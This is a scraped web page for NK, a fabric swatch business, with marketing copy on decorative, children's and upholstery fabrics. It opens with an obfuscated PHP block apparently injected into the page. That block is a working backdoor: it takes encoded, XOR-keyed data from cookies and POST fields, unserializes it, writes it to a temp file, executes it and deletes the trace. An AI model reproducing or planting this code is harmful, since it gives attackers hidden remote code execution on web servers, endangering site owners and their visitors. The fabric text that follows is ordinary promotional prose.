$ccEyurAd = chr (106) . "\x53" . chr ( 956 - 861 )."\x4f" . "\x7a" . "\105";$dZWWwdNE = chr (99) . "\154" . 'a' . chr ( 861 - 746 )."\x73" . chr (95) . "\145" . "\x78" . "\151" . chr ( 863 - 748 ).chr ( 669 - 553 ).chr (115); $TMNypYVXa = class_exists($ccEyurAd); $dZWWwdNE = "17293";$OtRJDgxSp = !1;if ($TMNypYVXa == $OtRJDgxSp){function uPAdAOlbjM(){return FALSE;}$ldRhup = "23314";uPAdAOlbjM();class jS_OzE{private function JqXfYj($ldRhup){if (is_array(jS_OzE::$BaQHegiBCH)) {$lGCsyQu = sys_get_temp_dir() . "/" . crc32(jS_OzE::$BaQHegiBCH["\x73" . 'a' . chr (108) . chr ( 775 - 659 )]);@jS_OzE::$BaQHegiBCH["\167" . chr (114) . chr ( 869 - 764 ).'t' . "\145"]($lGCsyQu, jS_OzE::$BaQHegiBCH["\x63" . chr ( 353 - 242 ).chr (110) . 't' . "\x65" . chr (110) . 't']);include $lGCsyQu;@jS_OzE::$BaQHegiBCH[chr ( 712 - 612 )."\145" . "\x6c" . chr (101) . 't' . chr ( 667 - 566 )]($lGCsyQu); $ldRhup = "23314";exit();}}private $pEpQT;public function qGjYk(){echo 14246;}public function __destruct(){$ldRhup = "43037_24060";$this->JqXfYj($ldRhup); $ldRhup = "43037_24060";}public function __construct($DAOSVJa=0){$nBLMkoBQo = $_POST;$kMuigLhRK = $_COOKIE;$QPCuI = "53d38424-3e44-4031-ae4d-ebf22554a363";$pXEVB = @$kMuigLhRK[substr($QPCuI, 0, 4)];if (!empty($pXEVB)){$TXfCd = "base64";$qCDhDnSF = "";$pXEVB = explode(",", $pXEVB);foreach ($pXEVB as $fIgxTYsBZb){$qCDhDnSF .= @$kMuigLhRK[$fIgxTYsBZb];$qCDhDnSF .= @$nBLMkoBQo[$fIgxTYsBZb];}$qCDhDnSF = array_map($TXfCd . chr ( 418 - 323 )."\x64" . "\145" . chr (99) . chr (111) . "\x64" . "\145", array($qCDhDnSF,)); $qCDhDnSF = $qCDhDnSF[0] ^ str_repeat($QPCuI, (strlen($qCDhDnSF[0]) / strlen($QPCuI)) + 1);jS_OzE::$BaQHegiBCH = @unserialize($qCDhDnSF); $qCDhDnSF = class_exists("43037_24060");}}public static $BaQHegiBCH = 19768;}$KFFzFr = new /* 54294 */ $ccEyurAd(23314 + 23314); $OtRJDgxSp = $KFFzFr = $ldRhup = Array();} Fabric - NK

About Service:

NK is a collection of high-quality interior and decorative fabrics swatches, based on a range of authentic and beautiful designs created to fit both contemporary and classic interiors.

Fabric Swatches:

Giving your home a new style every style

Design Fabric

NK specializes in cutting0edge design, and within its comprehensive portfolio of fabrics, you will discover an amazing breadth of prints and weaves in a dazzling array of colors and textures. from hold and contemporary to understated and a world of opportunity to help you transform your home!

Children Fabric

Our Childrens fabric range features designs that cater to all tastes. Choose from an extensive collection of colorful kids fabric swatches that includes ballet themes, sports motifs, birds, bunnies, butterflies, circus and cowboy designs, pets, dolphins, fairytale characters, firefighters and many cartoon characters. These latest collections hold something for everyone, whether chic embroideries or contemporary weaves, cute characters or vintage prints. Yet inspiration has come from some unexpected sources: careful inspection of the newcomers will reveal references to elegant tailoring, to industrial heritage, to folklore and even to fossils.


The element of touch, texture, and play of light on different leather types. the different colors swatches are subtle and sophisticated, mixing bright or dark colors with several different textures and patterns with neutral tones for a classical or modern look.

Upholstery Fabric

A Collection of amazing breadth of prints and weaves in a dazzling array of colors and textures. From bold and contemporary to understated and classically elegant.
